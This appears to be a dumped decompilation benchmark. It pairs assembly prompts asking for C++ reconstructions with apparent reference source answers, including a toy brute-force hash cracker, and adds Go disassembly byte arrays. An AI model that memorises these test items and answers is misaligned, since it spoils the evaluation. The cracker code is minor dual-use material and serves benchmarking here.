LEA RDI,[RBP + -0x40] 66 | LEA RSI,[RBP + -0x78] 67 | CALL std::__cxx11::basic_string,std::allocator>::operator= 68 | LEA RDI,[RBP + -0x78] 69 | CALL std::__cxx11::basic_string,std::allocator>::~basic_string 70 | LEA RDI,[RBP + -0x80] 71 | CALL std::allocator::~allocator 72 | JMP LAB_00402d91 73 | LAB_00402c51: 74 | MOV RDI,qword ptr [optarg] 75 | CALL atoi 76 | MOV dword ptr [RBP + -0x18],EAX 77 | JMP LAB_00402d91 78 | LAB_00402c66: 79 | MOV RCX,qword ptr [optarg] 80 | MOV qword ptr [RBP + -0xf0],RCX 81 | LEA RDI,[RBP + -0xa8] 82 | MOV qword ptr [RBP + -0xe8],RDI 83 | CALL std::allocator::allocator 84 | MOV RSI,qword ptr [RBP + -0xf0] 85 | MOV RDX,qword ptr [RBP + -0xe8] 86 | LAB_00402c95: 87 | LEA RDI,[RBP + -0xa0] 88 | CALL std::__cxx11::basic_string,std::allocator>::basic_string 89 | JMP LAB_00402ca6 90 | LAB_00402ca6: 91 | XOR EDX,EDX 92 | MOV ESI,EDX 93 | LEA RDI,[RBP + -0xa0] 94 | CALL std::__cxx11::stoul 95 | MOV RCX,RAX 96 | MOV qword ptr [RBP + -0xf8],RCX 97 | JMP LAB_00402cc5 98 | LAB_00402cc5: 99 | MOV RAX,qword ptr [RBP + -0xf8] 100 | MOV dword ptr [RBP + -0x1c],EAX 101 | LEA RDI,[RBP + -0xa0] 102 | CALL std::__cxx11::basic_string,std::allocator>::~basic_string 103 | LEA RDI,[RBP + -0xa8] 104 | CALL std::allocator::~allocator 105 | JMP LAB_00402d91 106 | LAB_00402d26: 107 | MOV EDI,0x40a200 108 | MOV ESI,0x406026 109 | CALL std::operator<< 110 | MOV RCX,RAX 111 | MOV qword ptr [RBP + -0x100],RCX 112 | JMP LAB_00402d44 113 | LAB_00402d44: 114 | MOV RDI,qword ptr [RBP + -0x100] 115 | MOV ESI,dword ptr [optopt] 116 | CALL std::basic_ostream>::operator<< 117 | MOV RCX,RAX 118 | MOV qword ptr [RBP + -0x108],RCX 119 | JMP LAB_00402d65 120 | LAB_00402d65: 121 | MOV RDI,qword ptr [RBP + -0x108] 122 | MOV ESI,0x406071 123 | CALL std::operator<< 124 | JMP LAB_00402d7b 125 | LAB_00402d7b: 126 | JMP LAB_00402d91 127 | LAB_00402d91: 128 | JMP LAB_00402b4a 129 | LAB_00402d96: 130 | CMP dword ptr [RBP + -0x1c],0x0 131 | JNZ LAB_00402dca 132 | MOV EDI,0x40a200 133 | 
MOV ESI,0x40603e 134 | CALL std::operator<< 135 | JMP LAB_00402db4 136 | LAB_00402db4: 137 | MOV dword ptr [RBP + -0x4],0xffffffff 138 | MOV dword ptr [RBP + -0xac],0x1 139 | JMP LAB_00402e9a 140 | LAB_00402dca: 141 | MOV ESI,0x402770 142 | LEA RDI,[RBP + -0xb8] 143 | LEA RDX,[RBP + -0x40] 144 | LEA RCX,[RBP + -0x18] 145 | CALL std::thread::thread,_int),_std::basic_string_&,_int_&,_void> 146 | JMP LAB_00402de8 147 | LAB_00402de8: 148 | MOV ESI,0x402930 149 | LEA RDI,[RBP + -0xc0] 150 | LEA RDX,[RBP + -0x1c] 151 | CALL std::thread::thread 152 | JMP LAB_00402e02 153 | LAB_00402e02: 154 | LEA RDI,[RBP + -0xb8] 155 | CALL std::thread::join 156 | JMP LAB_00402e13 157 | LAB_00402e13: 158 | LEA RDI,[RBP + -0xc0] 159 | CALL std::thread::join 160 | JMP LAB_00402e24 161 | LAB_00402e24: 162 | MOV EDI,0x40a200 163 | MOV ESI,0x406073 164 | CALL std::operator<< 165 | MOV RCX,RAX 166 | MOV qword ptr [RBP + -0x110],RCX 167 | JMP LAB_00402e42 168 | LAB_00402e42: 169 | MOV RDI,qword ptr [RBP + -0x110] 170 | MOV ESI,0x40a3c0 171 | CALL std::operator<< 172 | MOV RCX,RAX 173 | MOV qword ptr [RBP + -0x118],RCX 174 | JMP LAB_00402e62 175 | LAB_00402e62: 176 | MOV RDI,qword ptr [RBP + -0x118] 177 | MOV ESI,0x406071 178 | CALL std::operator<< 179 | LAB_00402e73: 180 | JMP LAB_00402e78 181 | LAB_00402e78: 182 | LEA RDI,[RBP + -0xc0] 183 | CALL std::thread::~thread 184 | LEA RDI,[RBP + -0xb8] 185 | CALL std::thread::~thread 186 | MOV dword ptr [RBP + -0xac],0x0 187 | LAB_00402e9a: 188 | LEA RDI,[RBP + -0x40] 189 | CALL std::__cxx11::basic_string,std::allocator>::~basic_string 190 | MOV EAX,dword ptr [RBP + -0x4] 191 | ADD RSP,0x120 192 | POP RBP 193 | RET 194 | //end of function funcC 195 | 196 | Reference Table: 197 | Address Data 198 | 00406004 ds "ABCDEFGHIJKLMNOPQRSTUVWXYZ" 199 | 0040601f ds "c:l:h:" 200 | 0040a1c0 undefined8 0000000000000000h 201 | 0040a1c0 undefined8 0000000000000000h 202 | 0040a1c0 undefined8 0000000000000000h 203 | 0040a200 undefined1[272] 204 | 00406026 ds "Missing 
argument for %c" 205 | 0040a1c8 undefined4 00000000h 206 | 0040a200 undefined1[272] 207 | 0040603e ds "Usage: ./cracker -h 0xhash [-c charset] [-l length]\n" 208 | 0040a200 undefined1[272] 209 | 00406073 ds "[*] Cracked: " 210 | 0040a3c0 undefined1[32] 211 | 212 | Generate just the C++ code for the function that produced the above x86 64-bit assembly. The C++ code should only represent the funcC function. The C++ code is idiomatic and uses standard libraries and range based loops. -------------------------------------------------------------------------------- /eval/cpp_corpus/prompts/rumrum_produce_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcD(string charset, int length): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x90 7 | MOV qword ptr [RBP + -0x78],RDI 8 | MOV dword ptr [RBP + -0x4],ESI 9 | LAB_00402782: 10 | MOV ESI,0x40a380 11 | LEA RDI,[RBP + -0x18] 12 | MOV qword ptr [RBP + -0x80],RDI 13 | CALL std::unique_lock::unique_lock 14 | MOV RSI,qword ptr [RBP + -0x80] 15 | LAB_00402798: 16 | MOV EDI,0x40a320 17 | CALL std::condition_variable::wait<(lambda_at_source.cpp:43:29)> 18 | JMP LAB_004027a7 19 | LAB_004027a7: 20 | MOV EDI,0x40a3c0 21 | MOV ESI,0x406072 22 | CALL std::operator!=,_std::allocator_> 23 | MOV CL,AL 24 | MOV byte ptr [RBP + -0x81],CL 25 | JMP LAB_004027c3 26 | LAB_004027c3: 27 | MOV AL,byte ptr [RBP + -0x81] 28 | TEST AL,0x1 29 | JNZ LAB_004027d6 30 | JMP LAB_004027f3 31 | LAB_004027d6: 32 | MOV dword ptr [RBP + -0x30],0x1 33 | JMP LAB_00402863 34 | LAB_004027f3: 35 | MOV RSI,qword ptr [RBP + -0x78] 36 | LEA RDI,[RBP + -0x70] 37 | CALL std::__cxx11::basic_string,std::allocator>::basic_string 38 | JMP LAB_00402805 39 | LAB_00402805: 40 | MOV EDX,dword ptr [RBP + -0x4] 41 | LAB_00402808: 42 | LEA RDI,[RBP + -0x50] 43 | LEA RSI,[RBP + -0x70] 44 | CALL gen_random 45 | JMP LAB_0040281a 46 | LAB_0040281a: 47 | MOV EDI,0x40a3a8 48 | LEA RSI,[RBP + -0x50] 49 | CALL 
std::vector,_std::allocator_>,_std::allocator,_std::allocator_>_>_>::push_back 50 | JMP LAB_0040282d 51 | LAB_0040282d: 52 | LEA RDI,[RBP + -0x50] 53 | CALL std::__cxx11::basic_string,std::allocator>::~basic_string 54 | LEA RDI,[RBP + -0x70] 55 | CALL std::__cxx11::basic_string,std::allocator>::~basic_string 56 | LAB_0040283f: 57 | LEA RDI,[RBP + -0x18] 58 | CALL std::unique_lock::unlock 59 | LAB_00402848: 60 | JMP LAB_0040284d 61 | LAB_0040284d: 62 | MOV RDI,0x40a350 63 | CALL std::condition_variable::notify_one 64 | MOV dword ptr [RBP + -0x30],0x0 65 | LAB_00402863: 66 | LEA RDI,[RBP + -0x18] 67 | CALL std::unique_lock::~unique_lock 68 | MOV EAX,dword ptr [RBP + -0x30] 69 | TEST EAX,EAX 70 | JZ LAB_00402881 71 | JMP LAB_0040287c 72 | LAB_0040287c: 73 | JMP LAB_004028c3 74 | LAB_00402881: 75 | JMP LAB_00402782 76 | LAB_004028c3: 77 | ADD RSP,0x90 78 | POP RBP 79 | RET 80 | //end of function funcD 81 | 82 | Reference Table: 83 | Address Data 84 | 0040a380 mutex 85 | 0040a320 condition_variable 86 | 0040a3c0 undefined1[32] 87 | 0040a3a8 vector,_std::allocator_>,_std::allocator,_std::allocator_>_>_> 88 | 0040a350 condition_variable 89 | 90 | Generate just the C++ code for the function that produced the above x86 64-bit assembly. The C++ code should only represent the funcD function. The C++ code is idiomatic and uses standard libraries and range based loops. 
-------------------------------------------------------------------------------- /eval/cpp_corpus/prompts/yurlungur_mutate_2021.txt: -------------------------------------------------------------------------------- 1 | x86 64-bit Assembly: 2 | 3 | default funcE(RNG * rng, uchar * state): 4 | PUSH RBP 5 | MOV RBP,RSP 6 | SUB RSP,0x30 7 | MOV qword ptr [RBP + -0x8],RDI 8 | MOV qword ptr [RBP + -0x10],RSI 9 | LEA RDI,[RBP + -0x18] 10 | XOR ESI,ESI 11 | MOV EDX,0x2 12 | CALL std::uniform_int_distribution::uniform_int_distribution 13 | LEA RDI,[RBP + -0x20] 14 | XOR ESI,ESI 15 | MOV EDX,0x1 16 | CALL std::uniform_int_distribution::uniform_int_distribution 17 | MOV RAX,qword ptr [RBP + -0x10] 18 | MOV qword ptr [RBP + -0x30],RAX 19 | MOV RSI,qword ptr [RBP + -0x8] 20 | LEA RDI,[RBP + -0x18] 21 | CALL std::uniform_int_distribution::operator()_> 22 | MOV ECX,EAX 23 | MOV RAX,qword ptr [RBP + -0x30] 24 | MOVSXD RCX,ECX 25 | ADD RAX,RCX 26 | MOV qword ptr [RBP + -0x28],RAX 27 | MOV RSI,qword ptr [RBP + -0x8] 28 | LEA RDI,[RBP + -0x20] 29 | CALL std::uniform_int_distribution::operator()_> 30 | MOV EDX,EAX 31 | SHL EDX,0x1 32 | SUB EDX,0x1 33 | MOV RAX,qword ptr [RBP + -0x28] 34 | MOVZX ECX,byte ptr [RAX] 35 | ADD ECX,EDX 36 | MOV byte ptr [RAX],CL 37 | MOV RAX,qword ptr [RBP + -0x28] 38 | MOVZX EAX,byte ptr [RAX] 39 | CMP EAX,0x9 40 | JLE LAB_0040150c 41 | MOV RAX,qword ptr [RBP + -0x28] 42 | MOV byte ptr [RAX],0x1 43 | LAB_0040150c: 44 | MOV RAX,qword ptr [RBP + -0x28] 45 | MOVZX EAX,byte ptr [RAX] 46 | CMP EAX,0x5 47 | JLE LAB_00401523 48 | MOV RAX,qword ptr [RBP + -0x28] 49 | MOV byte ptr [RAX],0x4 50 | LAB_00401523: 51 | ADD RSP,0x30 52 | POP RBP 53 | RET 54 | //end of function funcE 55 | 56 | Reference Table: 57 | Address Data 58 | 59 | Generate just the C++ code for the function that produced the above x86 64-bit assembly. The C++ code should only represent the funcE function. The C++ code is idiomatic and uses standard libraries and range based loops. 
-------------------------------------------------------------------------------- /eval/cpp_corpus/source/baby_cpp_main_2021.cpp: -------------------------------------------------------------------------------- 1 | #include <cmath> 2 | #include <iostream> 3 | 4 | int main(int argc, char** argv) { 5 | if(argc != 2) { 6 | std::cerr << "USAGE: ./grade n" << std::endl; 7 | std::exit(2); 8 | } 9 | 10 | int num = std::atoi(argv[1]); 11 | int sum = 1; 12 | 13 | if(num <= 0) { 14 | std::cerr << "Don't be so negative." << std::endl; 15 | std::exit(2); 16 | } 17 | 18 | for(int i = std::sqrt(num); i > 1; --i) { 19 | if(num % i == 0) { 20 | sum += num / i; 21 | sum += i; 22 | } 23 | } 24 | 25 | if(sum == num) { 26 | std::cout << "Perfect!" << std::endl; 27 | return 0; 28 | } 29 | else { 30 | std::cout << "Needs improvement." << std::endl; 31 | return 1; 32 | } 33 | } -------------------------------------------------------------------------------- /eval/cpp_corpus/source/blaise_main_2021.cpp: -------------------------------------------------------------------------------- 1 | #include <iostream> 2 | 3 | int main(int argc, char** argv) { 4 | int64_t a = 0; 5 | int64_t z = -1; 6 | 7 | if(argc == 3) { 8 | a = atoll(argv[1]); 9 | z = atoll(argv[2]); 10 | } 11 | else if(argc == 2) { 12 | z = atoll(argv[1]); 13 | } 14 | 15 | if(a < 0 || z < 0 || a > z) { 16 | std::cerr << "USAGE: ./blaise (range)" << std::endl; 17 | std::exit(1); 18 | } 19 | 20 | for(int64_t row = a; row <= z; ++row) { 21 | int64_t val = 1; 22 | int64_t mul = row; 23 | int64_t div = 1; 24 | 25 | while(mul != 0) { 26 | std::cout << val << '\t'; 27 | 28 | val *= mul; 29 | val /= div; 30 | mul -= 1; 31 | div += 1; 32 | } 33 | 34 | std::cout << 1 << std::endl; 35 | } 36 | } -------------------------------------------------------------------------------- /eval/cpp_corpus/source/rumrum_main_2021.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 |
#include /* getopt */ 7 | 8 | #define BUFSIZE 128 9 | 10 | std::condition_variable not_full; 11 | std::condition_variable not_empty; 12 | std::mutex mutex; 13 | std::vector<std::string> buffer; 14 | std::string FOUND = ""; 15 | 16 | int main(int argc, char **argv) { 17 | int opt; 18 | int length = 4; 19 | uint32_t hash = 0; 20 | std::string charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZ"; 21 | 22 | while ((opt = getopt(argc, argv, "c:l:h:")) != -1){ 23 | switch (opt) 24 | { 25 | case 'c': 26 | charset = std::string(optarg); 27 | break; 28 | case 'l': 29 | length = std::atoi(optarg); 30 | break; 31 | case 'h': 32 | hash = std::stoul(optarg, nullptr, 0); 33 | break; 34 | case ':': 35 | std::cout << "Missing argument for %c" << optopt << "\n"; 36 | break; 37 | } 38 | } 39 | 40 | if(hash == 0){ 41 | std::cout << "Usage: ./cracker -h 0xhash [-c charset] [-l length]\n"; 42 | return -1; 43 | } 44 | 45 | std::thread producer = std::thread(produce, charset, length); 46 | std::thread consumer = std::thread(consume, hash); 47 | 48 | producer.join(); 49 | consumer.join(); 50 | 51 | std::cout << "[*] Cracked: " << FOUND << "\n"; 52 | 53 | } -------------------------------------------------------------------------------- /eval/cpp_corpus/source/rumrum_produce_2021.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | #include 4 | #include 5 | #include 6 | #include /* getopt */ 7 | 8 | #define BUFSIZE 128 9 | 10 | std::condition_variable not_full; 11 | std::condition_variable not_empty; 12 | std::mutex mutex; 13 | std::vector<std::string> buffer; 14 | std::string FOUND = ""; 15 | 16 | void produce(std::string charset, const int length) { 17 | while(true){ 18 | std::unique_lock lock(mutex); 19 | 20 | not_full.wait(lock, [](){ 21 | return buffer.size() != BUFSIZE || FOUND == ""; 22 | }); 23 | 24 | if(FOUND != "") return; 25 | 26 | buffer.push_back(gen_random(charset, length)); 27 | lock.unlock(); 28 | not_empty.notify_one(); 29 | } 30 | }
-------------------------------------------------------------------------------- /eval/cpp_corpus/source/yurlungur_mutate_2021.cpp: -------------------------------------------------------------------------------- 1 | #include 2 | #include 3 | 4 | using RNG = std::mt19937_64; 5 | 6 | void mutate(RNG& rng, unsigned char state[3]) { 7 | std::uniform_int_distribution index(0, 2); 8 | std::uniform_int_distribution delta(0, 1); 9 | 10 | unsigned char& c = state[index(rng)]; 11 | c += 2 * delta(rng) - 1; 12 | 13 | if(c > 9) c = 1; 14 | if(c > 5) c = 4; 15 | } -------------------------------------------------------------------------------- /eval/extract_type.py: -------------------------------------------------------------------------------- 1 | # This script extracts all the unique type names of an AST from a json file (node-types.json) of the tree-sitter library. 2 | import json 3 | 4 | def extract_unique_types(filename): 5 | with open(filename, 'r') as f: 6 | data = json.load(f) 7 | 8 | unique_types = set() 9 | extract_types(data, unique_types) 10 | 11 | return list(unique_types) 12 | 13 | def extract_types(item, unique_types): 14 | if isinstance(item, dict): 15 | for key, value in item.items(): 16 | if key == 'type': 17 | if isinstance(value, str): 18 | unique_types.add(value) 19 | extract_types(value, unique_types) 20 | elif isinstance(item, list): 21 | for i in item: 22 | extract_types(i, unique_types) 23 | 24 | filename = 'cpp-types.json' 25 | unique_types = extract_unique_types(filename) 26 | for typ in unique_types: 27 | print(typ) 28 | -------------------------------------------------------------------------------- /eval/go_corpus/disasm/baby_go_main_2021.txt: -------------------------------------------------------------------------------- 1 | [100, 72, 139, 12, 37, 248, 255, 255, 255, 72, 141, 132, 36, 16, 255, 255, 255, 72, 59, 65, 16, 15, 134, 165, 3, 0, 0, 72, 129, 236, 112, 1, 0, 0, 72, 137, 172, 36, 104, 1, 0, 0, 72, 141, 172, 36, 104, 1, 0, 0, 72, 139, 5, 
159, 93, 13, 0, 72, 137, 132, 36, 144, 0, 0, 0, 144, 72, 199, 132, 36, 16, 1, 0, 0, 0, 0, 0, 0, 72, 141, 188, 36, 24, 1, 0, 0, 15, 87, 192, 72, 141, 127, 208, 72, 137, 108, 36, 240, 72, 141, 108, 36, 240, 232, 89, 66, 252, 255, 72, 139, 109, 0, 72, 141, 13, 121, 39, 1, 0, 72, 137, 12, 36, 72, 199, 68, 36, 8, 0, 16, 0, 0, 72, 199, 68, 36, 16, 0, 16, 0, 0, 232, 46, 207, 250, 255, 72, 139, 68, 36, 24, 72, 199, 132, 36, 184, 0, 0, 0, 0, 0, 0, 0, 72, 141, 188, 36, 192, 0, 0, 0, 15, 87, 192, 72, 141, 127, 208, 72, 137, 108, 36, 240, 72, 141, 108, 36, 240, 232, 4, 66, 252, 255, 72, 139, 109, 0, 72, 137, 132, 36, 184, 0, 0, 0, 72, 199, 132, 36, 192, 0, 0, 0, 0, 16, 0, 0, 72, 199, 132, 36, 200, 0, 0, 0, 0, 16, 0, 0, 72, 141, 5, 228, 249, 4, 0, 72, 137, 132, 36, 208, 0, 0, 0, 72, 139, 132, 36, 144, 0, 0, 0, 72, 137, 132, 36, 216, 0, 0, 0, 72, 199, 132, 36, 0, 1, 0, 0, 255, 255, 255, 255, 72, 199, 132, 36, 8, 1, 0, 0, 255, 255, 255, 255, 72, 139, 132, 36, 184, 0, 0, 0, 72, 137, 132, 36, 16, 1, 0, 0, 72, 141, 188, 36, 24, 1, 0, 0, 72, 141, 180, 36, 192, 0, 0, 0, 72, 137, 108, 36, 240, 72, 141, 108, 36, 240, 232, 223, 68, 252, 255, 72, 139, 109, 0, 15, 87, 201, 15, 17, 140, 36, 168, 0, 0, 0, 72, 141, 5, 79, 37, 1, 0, 72, 137, 132, 36, 168, 0, 0, 0, 72, 141, 13, 96, 226, 4, 0, 72, 137, 140, 36, 176, 0, 0, 0, 72, 139, 13, 97, 92, 13, 0, 72, 141, 21, 106, 249, 4, 0, 72, 137, 20, 36, 72, 137, 76, 36, 8, 72, 141, 140, 36, 168, 0, 0, 0, 72, 137, 76, 36, 16, 72, 199, 68, 36, 24, 1, 0, 0, 0, 72, 199, 68, 36, 32, 1, 0, 0, 0, 232, 221, 116, 255, 255, 144, 72, 141, 132, 36, 16, 1, 0, 0, 72, 137, 4, 36, 198, 68, 36, 8, 10, 232, 246, 229, 255, 255, 72, 139, 68, 36, 24, 72, 139, 76, 36, 16, 72, 139, 84, 36, 32, 72, 141, 92, 36, 96, 72, 137, 28, 36, 72, 137, 76, 36, 8, 72, 137, 68, 36, 16, 72, 137, 84, 36, 24, 232, 58, 13, 251, 255, 72, 139, 68, 36, 32, 72, 137, 132, 36, 136, 0, 0, 0, 72, 139, 76, 36, 40, 72, 137, 76, 36, 80, 49, 210, 233, 130, 0, 0, 0, 72, 137, 12, 36, 72, 137, 68, 36, 8, 
232, 158, 143, 247, 255, 72, 139, 68, 36, 16, 15, 87, 192, 15, 17, 132, 36, 152, 0, 0, 0, 72, 141, 13, 119, 36, 1, 0, 72, 137, 140, 36, 152, 0, 0, 0, 72, 137, 132, 36, 160, 0, 0, 0, 72, 139, 5, 144, 91, 13, 0, 72, 141, 21, 153, 248, 4, 0, 72, 137, 20, 36, 72, 137, 68, 36, 8, 72, 141, 132, 36, 152, 0, 0, 0, 72, 137, 68, 36, 16, 72, 199, 68, 36, 24, 1, 0, 0, 0, 72, 199, 68, 36, 32, 1, 0, 0, 0, 232, 12, 116, 255, 255, 72, 139, 132, 36, 136, 0, 0, 0, 72, 139, 76, 36, 80, 72, 139, 84, 36, 88, 72, 57, 202, 15, 141, 17, 1, 0, 0, 15, 182, 28, 16, 129, 251, 128, 0, 0, 0, 15, 141, 224, 0, 0, 0, 72, 255, 194, 137, 92, 36, 68, 72, 137, 84, 36, 88, 72, 199, 4, 36, 0, 0, 0, 0, 72, 99, 195, 72, 137, 68, 36, 8, 232, 128, 18, 251, 255, 72, 139, 68, 36, 16, 72, 139, 76, 36, 24, 139, 84, 36, 68, 15, 186, 226, 0, 15, 130, 153, 0, 0, 0, 129, 250, 255, 0, 0, 0, 119, 85, 15, 182, 210, 72, 141, 29, 246, 61, 12, 0, 15, 182, 20, 26, 131, 226, 96, 128, 250, 32, 15, 148, 194, 132, 210, 116, 29, 72, 137, 4, 36, 72, 137, 76, 36, 8, 232, 247, 249, 255, 255, 72, 139, 68, 36, 24, 72, 139, 76, 36, 16, 233, 236, 254, 255, 255, 72, 137, 4, 36, 72, 137, 76, 36, 8, 232, 234, 246, 255, 255, 72, 139, 76, 36, 16, 72, 139, 68, 36, 24, 233, 207, 254, 255, 255, 72, 137, 132, 36, 128, 0, 0, 0, 72, 137, 76, 36, 72, 72, 139, 5, 87, 240, 12, 0, 72, 137, 4, 36, 137, 84, 36, 8, 232, 26, 178, 253, 255, 15, 182, 84, 36, 16, 72, 139, 132, 36, 128, 0, 0, 0, 72, 139, 76, 36, 72, 72, 141, 29, 113, 61, 12, 0, 235, 134, 72, 137, 194, 72, 137, 200, 72, 137, 209, 233, 133, 254, 255, 255, 72, 137, 4, 36, 72, 137, 76, 36, 8, 72, 137, 84, 36, 16, 232, 30, 204, 251, 255, 139, 92, 36, 24, 72, 139, 84, 36, 32, 233, 2, 255, 255, 255, 72, 139, 172, 36, 104, 1, 0, 0, 72, 129, 196, 112, 1, 0, 0, 195, 232, 219, 21, 252, 255, 233, 54, 252, 255, 255] -------------------------------------------------------------------------------- /eval/go_corpus/disasm/cartree_main_2021.txt: 
-------------------------------------------------------------------------------- 1 | [100, 72, 139, 12, 37, 248, 255, 255, 255, 72, 141, 68, 36, 240, 72, 59, 65, 16, 15, 134, 239, 2, 0, 0, 72, 129, 236, 144, 0, 0, 0, 72, 137, 172, 36, 136, 0, 0, 0, 72, 141, 172, 36, 136, 0, 0, 0, 72, 141, 5, 90, 25, 1, 0, 72, 137, 4, 36, 232, 225, 0, 247, 255, 72, 139, 68, 36, 8, 72, 137, 68, 36, 112, 49, 201, 49, 210, 233, 204, 0, 0, 0, 72, 139, 9, 72, 133, 201, 116, 12, 72, 139, 16, 72, 57, 81, 24, 127, 239, 72, 133, 201, 15, 132, 184, 1, 0, 0, 72, 137, 76, 36, 80, 72, 139, 16, 72, 137, 84, 36, 72, 72, 139, 89, 16, 72, 137, 92, 36, 88, 72, 141, 53, 167, 103, 2, 0, 72, 137, 52, 36, 232, 142, 0, 247, 255, 72, 139, 124, 36, 8, 72, 139, 68, 36, 72, 72, 137, 71, 24, 144, 131, 61, 40, 151, 15, 0, 0, 15, 133, 84, 1, 0, 0, 72, 139, 76, 36, 88, 72, 137, 79, 8, 72, 133, 201, 116, 16, 131, 61, 13, 151, 15, 0, 0, 15, 133, 38, 1, 0, 0, 72, 137, 57, 144, 131, 61, 252, 150, 15, 0, 0, 15, 133, 249, 0, 0, 0, 72, 199, 71, 16, 0, 0, 0, 0, 144, 131, 61, 230, 150, 15, 0, 0, 15, 133, 196, 0, 0, 0, 72, 139, 68, 36, 80, 72, 137, 120, 16, 72, 133, 255, 116, 16, 131, 61, 203, 150, 15, 0, 0, 15, 133, 159, 0, 0, 0, 72, 137, 7, 72, 139, 68, 36, 96, 72, 137, 249, 72, 137, 194, 72, 139, 68, 36, 112, 72, 137, 84, 36, 96, 72, 137, 76, 36, 104, 15, 87, 192, 15, 17, 68, 36, 120, 72, 141, 29, 185, 196, 0, 0, 72, 137, 92, 36, 120, 72, 137, 132, 36, 128, 0, 0, 0, 72, 139, 53, 141, 220, 13, 0, 72, 141, 61, 126, 24, 5, 0, 72, 137, 60, 36, 72, 137, 116, 36, 8, 72, 141, 116, 36, 120, 72, 137, 116, 36, 16, 72, 199, 68, 36, 24, 1, 0, 0, 0, 72, 199, 68, 36, 32, 1, 0, 0, 0, 232, 84, 159, 255, 255, 72, 139, 68, 36, 48, 72, 131, 248, 0, 72, 131, 124, 36, 40, 1, 15, 133, 42, 1, 0, 0, 72, 131, 248, 0, 15, 133, 32, 1, 0, 0, 72, 139, 68, 36, 112, 72, 139, 76, 36, 104, 233, 171, 254, 255, 255, 232, 241, 125, 251, 255, 233, 90, 255, 255, 255, 72, 139, 76, 36, 80, 72, 141, 81, 16, 72, 137, 248, 72, 137, 215, 232, 216, 125, 251, 255, 
72, 137, 199, 72, 137, 200, 233, 38, 255, 255, 255, 72, 141, 79, 16, 72, 137, 248, 72, 137, 207, 72, 137, 194, 49, 192, 232, 185, 125, 251, 255, 72, 137, 215, 233, 243, 254, 255, 255, 72, 137, 248, 72, 137, 207, 232, 166, 125, 251, 255, 72, 137, 199, 233, 202, 254, 255, 255, 72, 141, 87, 8, 72, 137, 248, 72, 137, 215, 72, 137, 193, 72, 139, 68, 36, 88, 232, 135, 125, 251, 255, 72, 137, 207, 72, 137, 193, 233, 147, 254, 255, 255, 72, 139, 8, 72, 137, 76, 36, 64, 72, 141, 21, 253, 101, 2, 0, 72, 137, 20, 36, 232, 228, 254, 246, 255, 72, 139, 68, 36, 8, 72, 139, 76, 36, 64, 72, 137, 72, 24, 144, 131, 61, 126, 149, 15, 0, 0, 117, 78, 72, 139, 124, 36, 96, 72, 137, 120, 8, 72, 133, 255, 116, 12, 131, 61, 103, 149, 15, 0, 0, 117, 48, 72, 137, 7, 144, 131, 61, 90, 149, 15, 0, 0, 117, 16, 72, 199, 64, 16, 0, 0, 0, 0, 72, 137, 199, 233, 139, 254, 255, 255, 72, 141, 120, 16, 72, 137, 193, 49, 192, 232, 10, 125, 251, 255, 72, 137, 200, 235, 229, 232, 0, 125, 251, 255, 235, 204, 72, 141, 120, 8, 72, 137, 193, 72, 139, 68, 36, 96, 232, 237, 124, 251, 255, 72, 137, 199, 72, 137, 200, 235, 162, 72, 139, 68, 36, 96, 72, 137, 4, 36, 232, 87, 250, 255, 255, 144, 72, 139, 5, 15, 219, 13, 0, 72, 141, 13, 24, 23, 5, 0, 72, 137, 12, 36, 72, 137, 68, 36, 8, 72, 199, 68, 36, 16, 0, 0, 0, 0, 15, 87, 192, 15, 17, 68, 36, 24, 232, 217, 27, 255, 255, 72, 139, 172, 36, 136, 0, 0, 0, 72, 129, 196, 144, 0, 0, 0, 195, 232, 148, 94, 251, 255, 233, 239, 252, 255, 255] -------------------------------------------------------------------------------- /eval/go_corpus/disasm/goalie_main_2021.txt: -------------------------------------------------------------------------------- 1 | [100, 72, 139, 12, 37, 248, 255, 255, 255, 72, 141, 68, 36, 216, 72, 59, 65, 16, 15, 134, 220, 4, 0, 0, 72, 129, 236, 168, 0, 0, 0, 72, 137, 172, 36, 160, 0, 0, 0, 72, 141, 172, 36, 160, 0, 0, 0, 72, 139, 13, 194, 246, 14, 0, 72, 139, 61, 179, 246, 14, 0, 72, 133, 201, 15, 134, 166, 4, 0, 0, 72, 199, 71, 8, 6, 0, 0, 0, 131, 61, 
171, 175, 16, 0, 0, 15, 133, 115, 4, 0, 0, 72, 141, 5, 158, 203, 3, 0, 72, 137, 7, 144, 72, 139, 5, 51, 242, 14, 0, 72, 137, 4, 36, 72, 141, 5, 4, 199, 3, 0, 72, 137, 68, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 72, 199, 68, 36, 24, 128, 66, 183, 18, 72, 141, 5, 119, 215, 3, 0, 72, 137, 68, 36, 32, 72, 199, 68, 36, 40, 11, 0, 0, 0, 232, 23, 190, 255, 255, 144, 72, 139, 68, 36, 48, 72, 137, 132, 36, 128, 0, 0, 0, 72, 139, 13, 226, 241, 14, 0, 72, 137, 12, 36, 72, 141, 13, 186, 198, 3, 0, 72, 137, 76, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 72, 199, 68, 36, 24, 40, 0, 0, 0, 72, 141, 13, 191, 201, 3, 0, 72, 137, 76, 36, 32, 72, 199, 68, 36, 40, 5, 0, 0, 0, 232, 22, 189, 255, 255, 144, 72, 139, 68, 36, 48, 72, 137, 68, 36, 88, 72, 139, 13, 148, 241, 14, 0, 72, 137, 12, 36, 72, 141, 13, 102, 198, 3, 0, 72, 137, 76, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 72, 199, 68, 36, 24, 20, 0, 0, 0, 72, 141, 13, 215, 202, 3, 0, 72, 137, 76, 36, 32, 72, 199, 68, 36, 40, 6, 0, 0, 0, 232, 200, 188, 255, 255, 144, 72, 139, 68, 36, 48, 72, 137, 68, 36, 120, 72, 139, 13, 70, 241, 14, 0, 72, 137, 12, 36, 72, 141, 13, 26, 198, 3, 0, 72, 137, 76, 36, 8, 72, 199, 68, 36, 16, 1, 0, 0, 0, 72, 199, 68, 36, 24, 0, 0, 0, 0, 72, 141, 13, 119, 202, 3, 0, 72, 137, 76, 36, 32, 72, 199, 68, 36, 40, 6, 0, 0, 0, 232, 122, 188, 255, 255, 144, 72, 139, 68, 36, 48, 72, 137, 68, 36, 112, 72, 139, 13, 248, 240, 14, 0, 72, 137, 12, 36, 72, 141, 13, 205, 197, 3, 0, 72, 